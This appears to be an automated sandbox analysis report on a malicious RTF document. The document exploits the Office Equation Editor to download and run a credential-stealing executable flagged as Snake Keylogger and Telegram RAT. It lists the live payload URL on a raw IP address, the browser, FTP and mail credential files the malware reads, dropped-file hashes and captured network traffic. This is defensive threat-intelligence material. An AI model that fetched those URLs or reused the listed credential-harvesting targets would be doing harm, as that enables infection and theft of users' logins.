Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 648, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 648, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rinzearec84736.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33d8c18.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rinzearec84736.exe.33745d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rinzearec84736.exe PID: 648, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	111 Process Injection	1 Masquerading	2 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	23 Exploitation for Client Execution	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	12 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	22 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	3 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf	20%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\rinzearec84736.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\arinzezx[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\arinzezx[1].exe	40%	ReversingLabs	ByteCode-MSIL.Trojan.Mamut
C:\Users\user\AppData\Roaming\rinzearec84736.exe	40%	ReversingLabs	ByteCode-MSIL.Trojan.Mamut

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.0.rinzearec84736.exe.400000.0.unpack	100%	Avira	TR/ATRAPS.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.orgP	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://208.67.105.179/arinzezx.exej	100%	Avira URL Cloud	malware
http://208.67.105.179/arinzezx.exe	100%	Avira URL Cloud	malware
http://208.67.105.179/arinzezx.exemmC:	100%	Avira URL Cloud	malware
http://208.67.105.179/arinzezx.exeC:	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
checkip.dyndns.com	193.122.6.168	true	false		unknown
checkip.dyndns.org	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://208.67.105.179/arinzezx.exe	true	Avira URL Cloud: malware	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://208.67.105.179/arinzezx.exemmC:	EQNEDT32.EXE, 00000002.00000002.908270484.000000000058F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://208.67.105.179/arinzezx.exej	EQNEDT32.EXE, 00000002.00000002.908270484.000000000058F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://checkip.dyndns.org	rinzearec84736.exe, 00000006.00000002.1173839391.00000000023B9000.00000004.00000800.00020000.00000000.sdmp, rinzearec84736.exe, 00000006.00000002.1173667930.0000000002361000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.orgP	rinzearec84736.exe, 00000006.00000002.1173667930.0000000002361000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	rinzearec84736.exe, 00000006.00000002.1173839391.00000000023B9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	rinzearec84736.exe, 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, rinzearec84736.exe, 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	rinzearec84736.exe, 00000006.00000002.1173667930.0000000002361000.00000004.00000800.00020000.00000000.sdmp	false		high
http://208.67.105.179/arinzezx.exeC:	EQNEDT32.EXE, 00000002.00000003.907989130.0000000000602000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://checkip.dyndns.org/q	rinzearec84736.exe, 00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp, rinzearec84736.exe, 00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.122.6.168	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false
208.67.105.179	unknown	United States		20042	GRAYSON-COLLIN-COMMUNICATIONSUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756118
Start date and time:	2022-11-29 16:49:20 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winRTF@7/6@2/2
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Failed
HCA Information:	Successful, ratio: 93% Number of executed functions: 103 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .rtf Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
Execution Graph export aborted for target EQNEDT32.EXE, PID 1236 because there are no executed function
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

Simulations

Behavior and APIs

Time	Type	Description
16:50:16	API Interceptor	250x Sleep call for process: EQNEDT32.EXE modified
16:50:21	API Interceptor	254x Sleep call for process: rinzearec84736.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.122.6.168	R70kWoqVqZ.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	frCrHQEzRr.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	CQz4snEQ0P.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Payment Advice.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.PWSX-gen.21070.24107.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Vsl's Particulars.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	NTFX7HAECp.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	6zN5zKCRll.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	RFQ MR 27138.xls	Get hash	malicious	Browse	checkip.dyndns.org/
	Shipping documents and BL. PDF.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	IVtyQFTDKX.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	ORD221125_001,pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	HSBC Payment Advice.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	DHL SHIPMENT DOCUMENTS.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.DropperX-gen.27449.29948.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.DropperX-gen.1926.22888.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	pc2oKyti4c.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	MV-SEA ROSA-073892892002__990new-pdf.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	Document.exe	Get hash	malicious	Browse	checkip.dyndns.org/
	INVOICE.exe	Get hash	malicious	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
checkip.dyndns.com	SecuriteInfo.com.Win32.CrypterX-gen.7551.3420.exe	Get hash	malicious	Browse	158.101.44.242
	SecuriteInfo.com.Win32.CrypterX-gen.2848.13330.exe	Get hash	malicious	Browse	132.226.247.73
	PO_28135_____.EXE.exe	Get hash	malicious	Browse	158.101.44.242
	FQCjNWmTBJ.exe	Get hash	malicious	Browse	132.226.8.169
	R70kWoqVqZ.exe	Get hash	malicious	Browse	193.122.6.168
	Invoice.exe	Get hash	malicious	Browse	193.122.130.0
	ORDER LISTS.exe	Get hash	malicious	Browse	132.226.247.73
	g55lzM5fsV.exe	Get hash	malicious	Browse	193.122.130.0
	SecuriteInfo.com.FileRepMalware.22126.757.exe	Get hash	malicious	Browse	193.122.130.0
	SecuriteInfo.com.Win32.PWSX-gen.7409.6325.exe	Get hash	malicious	Browse	158.101.44.242
	Overdue_account letter.PDF.exe	Get hash	malicious	Browse	132.226.247.73
	FACTURA.exe	Get hash	malicious	Browse	158.101.44.242
	frCrHQEzRr.exe	Get hash	malicious	Browse	193.122.6.168
	CQz4snEQ0P.exe	Get hash	malicious	Browse	193.122.6.168
	Payment Advice.exe	Get hash	malicious	Browse	158.101.44.242
	Payment For Invoice_EO-S08685_15112022171910.exe	Get hash	malicious	Browse	132.226.247.73
	ANEyCWTVX8.exe	Get hash	malicious	Browse	158.101.44.242
	file.exe	Get hash	malicious	Browse	132.226.8.169
	SecuriteInfo.com.Win32.PWSX-gen.21070.24107.exe	Get hash	malicious	Browse	193.122.130.0
	Ticari Hesap #U00d6zetiniz.exe	Get hash	malicious	Browse	132.226.247.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ORACLE-BMC-31898US	SecuriteInfo.com.Win32.CrypterX-gen.7551.3420.exe	Get hash	malicious	Browse	158.101.44.242
	PO_28135_____.EXE.exe	Get hash	malicious	Browse	158.101.44.242
	R70kWoqVqZ.exe	Get hash	malicious	Browse	193.122.6.168
	Invoice.exe	Get hash	malicious	Browse	193.122.130.0
	g55lzM5fsV.exe	Get hash	malicious	Browse	193.122.130.0
	SecuriteInfo.com.FileRepMalware.22126.757.exe	Get hash	malicious	Browse	193.122.130.0
	SecuriteInfo.com.Win32.PWSX-gen.7409.6325.exe	Get hash	malicious	Browse	158.101.44.242
	Overdue_account letter.PDF.exe	Get hash	malicious	Browse	193.122.130.0
	FACTURA.exe	Get hash	malicious	Browse	158.101.44.242
	frCrHQEzRr.exe	Get hash	malicious	Browse	193.122.6.168
	CQz4snEQ0P.exe	Get hash	malicious	Browse	193.122.6.168
	Payment Advice.exe	Get hash	malicious	Browse	158.101.44.242
	ANEyCWTVX8.exe	Get hash	malicious	Browse	158.101.44.242
	SecuriteInfo.com.Win32.PWSX-gen.21070.24107.exe	Get hash	malicious	Browse	193.122.130.0
	zmBUCwvvUk.exe	Get hash	malicious	Browse	193.122.130.0
	SecuriteInfo.com.Win32.PWSX-gen.9218.16650.exe	Get hash	malicious	Browse	158.101.44.242
	MAWB Number 160-49144406.exe	Get hash	malicious	Browse	158.101.44.242
	Vsl's Particulars.exe	Get hash	malicious	Browse	193.122.6.168
	swift.exe	Get hash	malicious	Browse	193.122.130.0
	Payment Copy.exe	Get hash	malicious	Browse	158.101.44.242

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	842240
Entropy (8bit):	7.591937795879761
Encrypted:	false
SSDEEP:	24576:62w3IksIWwMIA7ujjbdDerIY/HGDdEPf:XRksIWwMfQDef/HPP
MD5:	D248194D56895A1FAE8914E81CD9B36A
SHA1:	3F70834B9D80A8CAFB2FFBEE029D577660C90DCD
SHA-256:	61008831508DC534A4D55097106589C5761A011C6DC710977217DE7ED884B996
SHA-512:	D6B5B3F13C908BB1EB953091FC83FA65F3F4B650191E82D72CFAB17B5A7DDB452452C0F5E3B85A8A4FF624223657EC8FA5BA57D80DC84109244D64A1AE86A25D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 40%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-..c..............0.................. ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......<...........l...8u..X{..........................................^..}.....(.......(......0...........s......o......(........0...........s......o......(........0...........s......o......(........0...........s......o......(........0..+.........,..{.......+....,...{....o........(.......0..r.............(....s......s....}.....s....}.....s....}.....s....}.....(......{....(....o......{.....o......{.....o .....{....r...p"..@A...s!...o".....{....(#...o$.....{.... .... ..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Tue Nov 29 23:50:14 2022, length=14484, window=hide
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.561234909144671
Encrypted:	false
SSDEEP:	24:8ZN/XT9SU+MZTHCdH6eChrHHCdHDDv3qvu7D:8ZN/XTQr2THCF6hzHCFqv0D
MD5:	64F2897E2EE75D5959D062DD2925BB94
SHA1:	55400D4BDA7A405A3A17F1DC3CE4E349B22978E8
SHA-256:	490550A0B7F27F22660AF912CE716CA2792BE0D245A49B9712962A3AFBB65D5F
SHA-512:	4D3387646A5D3614A072614EB6AB464085E8A4EC36689EF1297D0B862663138904E9E9DB64A29E8D26E9DB83A1846ADD5A71145F10CFE90D7287667F2013B53E
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...w.p..3..w.p..3....h.U....8......................#....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..8..~UH. .SECURI~1.RTF.........hT..hT.....r.....'...............S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.8.-.0.7.9.8...4...1.1.3.0.1...2.4.8.3.6...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\642294\Users.user\Desktop\SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf.O.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...C.V.E.-.2.0.1.8.-.0.7.9.8...4...1.1.3.0.1...2.4.8.3.6...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [misc]
Category:	dropped
Size (bytes):	156
Entropy (8bit):	5.092884717261391
Encrypted:	false
SSDEEP:	3:bDuMJluscbcK+KUmjAomxW9rbcK+KUmjAov:bCVwKhRAOrwKhRAy
MD5:	2794692EF70251257065A2A957CC1EAC
SHA1:	CB3DA2288CFB2A84DAEFEC9D6BB5B82CA6F62378
SHA-256:	95BC66B886BF0A8C136DBE53867C0683976E80D24B5740DF5799507C941E2ACF
SHA-512:	C7842286162E773DE700B4DDB9BA43F94B8C175A517C4DF5886A1319398F3DB6EAF51DAD5E4C7F1193857A5FD4D1194D909068D296E56AA2CBA53E7B144BD608
Malicious:	false
Reputation:	low
Preview:	[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.LNK=0..[misc]..SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Users\user\AppData\Roaming\rinzearec84736.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	842240
Entropy (8bit):	7.591937795879761
Encrypted:	false
SSDEEP:	24576:62w3IksIWwMIA7ujjbdDerIY/HGDdEPf:XRksIWwMfQDef/HPP
MD5:	D248194D56895A1FAE8914E81CD9B36A
SHA1:	3F70834B9D80A8CAFB2FFBEE029D577660C90DCD
SHA-256:	61008831508DC534A4D55097106589C5761A011C6DC710977217DE7ED884B996
SHA-512:	D6B5B3F13C908BB1EB953091FC83FA65F3F4B650191E82D72CFAB17B5A7DDB452452C0F5E3B85A8A4FF624223657EC8FA5BA57D80DC84109244D64A1AE86A25D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-..c..............0.................. ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......<...........l...8u..X{..........................................^..}.....(.......(......0...........s......o......(........0...........s......o......(........0...........s......o......(........0...........s......o......(........0..+.........,..{.......+....,...{....o........(.......0..r.............(....s......s....}.....s....}.....s....}.....s....}.....(......{....(....o......{.....o......{.....o .....{....r...p"..@A...s!...o".....{....(#...o$.....{.... .... ..

C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	5.4057733010793765
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf
File size:	14484
MD5:	f2de9aa2a7a3c9890d2f799adc95c35b
SHA1:	404dabf3e31da0bbf666df6397f803983961794f
SHA256:	d04bf8b1677e02ada795c9a0e84abfca0ba2c1565736e9f34115783af32be764
SHA512:	46dde73a4611e2f99f6ddb8676442f1b6c93c659e61d43cf4bdc4cae331ff57396b363f2116297224b551c88743ae55261acc3e25d03d240fd195094457954f8
SSDEEP:	384:JR3Il9FfS6+D+uk/LQn9ze6faYZ0pzTOv2ZgLo:LIlfIyuBe4iTOeZgLo
TLSH:	4A526D7CE7445A9FDB9DB2F9121B722C069CBD2573D191EA0AB87333F42982E6707094
File Content Preview:	{\rtf1...............{\mmodso257517810 \#}.{\637152071.0',~.?.4;'='>#`]>#^#.\|~?^%@<75[?:^.,676:7%#_1/46?+)?<&.$?\|1+32~.\|;;$[21[.::75`.#</,&#>8+,.8?9\|;>?[;.]6.[`??[:%'8)=(*7@1?%.$%$?\|#',9%)-/0_%%6$0@3.--],~9<4[[6`0&.-,(=(~$%&61@(3<#1=/.\|]?4?#';=.`\|>:~_4_

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00001D1Eh								no

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 16:50:19.295629025 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.324132919 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.324248075 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.325438976 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.353758097 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.357974052 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358020067 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358045101 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358069897 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358093977 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358114004 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.358134031 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.358160019 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358185053 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358211040 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.358222008 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358247042 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358272076 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.358283043 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.358308077 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.358340979 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.371212959 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386260033 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386347055 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386384964 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386415005 CET	49171	80	192.168.2.22	208.67.105.179
